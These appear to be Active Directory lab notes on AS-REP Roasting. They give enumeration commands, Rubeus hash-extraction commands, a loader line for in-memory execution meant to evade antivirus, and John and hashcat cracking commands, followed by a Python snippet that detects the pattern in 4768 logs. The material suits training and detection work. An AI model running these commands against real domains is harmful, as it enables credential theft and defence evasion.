AS-REP Roasting Attack

What is an AS-REP Roasting Attack?

AS-REP Roasting is a technique that targets user accounts which do not require Kerberos pre-authentication. Normally, a user must encrypt a timestamp with their password hash and send it in the AS-REQ to prove their identity before the KDC issues a ticket. If the "Do not require Kerberos preauthentication" flag is set on an account, the Domain Controller instead sends an AS-REP containing data encrypted with that user's password hash to anyone who asks for it. That response can be captured and cracked offline.

Key Concepts

Pre-Authentication: A security feature that prevents offline password guessing by requiring the user to prove they know their password before the KDC issues a ticket.

DONT_REQ_PREAUTH: A flag in the userAccountControl (UAC) attribute. When set, the account is vulnerable to AS-REP Roasting.

No Domain Privileges Required: Unlike Kerberoasting, this attack only needs network connectivity to the DC; it can be performed without a valid domain account (though in the lab we usually run it from our student session).

Enumeration

# Load PowerView (dot-source it into the current session)
. C:\AD\Tools\PowerView.ps1
# Find users with Pre-Auth Not Required
Get-DomainUser -PreauthNotRequired
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname, useraccountcontrol

# Same check with the Microsoft AD module
Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
# DoesNotRequirePreAuth maps to the DONT_REQ_PREAUTH bit (0x400000 = 4194304) of userAccountControl
Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $True' -Properties DoesNotRequirePreAuth

Hash Extraction

# Extract hashes for all vulnerable users in the current domain
C:\AD\Tools\Rubeus.exe asreproast /format:hashcat /outfile:C:\AD\Tools\asrep_hashes.txt

# Target a specific user
C:\AD\Tools\Rubeus.exe asreproast /user:sqladmin /format:hashcat

# Execution in memory to bypass basic AV
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asreproast /format:hashcat /outfile:C:\AD\Tools\asrep_hashes.txt

OPSEC

Authentication Logs: Even though it is "roasting" rather than a logon, every AS-REQ makes the DC log a 4768 event (a Kerberos authentication ticket (TGT) was requested). Multiple requests for different users in a short time can look suspicious.

Unauthenticated Access: In a real engagement, this is often the "entry point" into the domain when you know a valid username but have no password.
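To show what the 4768 logging above gives a defender, here is an added example (not part of these notes) that scans pre-parsed 4768 records for the AS-REP Roasting pattern: successful TGT requests with Pre-Authentication Type 0, grouped by client address, with RC4 (etype 0x17, the hashcat 18200 case) called out. The records and field names are constructed to mirror the 4768 event XML; the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC; these are the hashcat 18200 hashes

# Constructed sample 4768 records; field names follow the 4768 event XML.
SAMPLE_EVENTS = [
    # normal logon: pre-auth type 2 (encrypted timestamp), AES256 session key
    {"TimeCreated": datetime(2024, 5, 1, 9, 0, 0), "TargetUserName": "alice",
     "IpAddress": "::ffff:10.0.0.5", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "Status": "0x0"},
    # pre-auth missing but required: KDC_ERR_PREAUTH_REQUIRED, nothing issued to crack
    {"TimeCreated": datetime(2024, 5, 1, 9, 0, 1), "TargetUserName": "bob",
     "IpAddress": "::ffff:10.0.0.77", "PreAuthType": "0",
     "TicketEncryptionType": "0xffffffff", "Status": "0x19"},
    # roasting: TGT issued with no pre-auth at all, RC4 encryption type
    {"TimeCreated": datetime(2024, 5, 1, 9, 0, 2), "TargetUserName": "sqladmin",
     "IpAddress": "::ffff:10.0.0.77", "PreAuthType": "0",
     "TicketEncryptionType": RC4_HMAC, "Status": "0x0"},
    {"TimeCreated": datetime(2024, 5, 1, 9, 0, 3), "TargetUserName": "svcbackup",
     "IpAddress": "::ffff:10.0.0.77", "PreAuthType": "0",
     "TicketEncryptionType": RC4_HMAC, "Status": "0x0"},
]

def is_asrep_candidate(ev):
    """Successful TGT request (Status 0x0) that used no pre-authentication (type 0)."""
    return ev["PreAuthType"] == "0" and ev["Status"] == "0x0"

def roasting_sources(events, window=timedelta(minutes=5), min_accounts=2):
    """Map client IP -> sorted account names for clients that obtained no-preauth
    TGTs for at least min_accounts distinct users within one sliding window."""
    by_ip = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if is_asrep_candidate(ev):
            by_ip[ev["IpAddress"]].append(ev)
    hits = {}
    for ip, evs in by_ip.items():
        for i, first in enumerate(evs):
            users = {e["TargetUserName"] for e in evs[i:]
                     if e["TimeCreated"] - first["TimeCreated"] <= window}
            if len(users) >= min_accounts:
                hits[ip] = sorted(users)
                break
    return hits

def rc4_candidates(events):
    """Accounts whose no-preauth AS-REP used RC4, the cheapest type to crack offline."""
    return sorted({ev["TargetUserName"] for ev in events
                   if is_asrep_candidate(ev) and ev["TicketEncryptionType"] == RC4_HMAC})
```

The failed request for bob (Status 0x19) is ignored on purpose: the KDC refused it, so no crackable AS-REP was returned, and only successful Pre-Authentication Type 0 events count.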

Cracking Offline

# John the Ripper (jumbo build) auto-detects the AS-REP hash format written by Rubeus
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\passwords.txt C:\AD\Tools\asrep_hashes.txt
# Mode 18200 is for Kerberos 5 AS-REP etype 23 (RC4); -a 0 is a straight wordlist attack
hashcat -m 18200 -a 0 asrep_hashes.txt wordlist.txt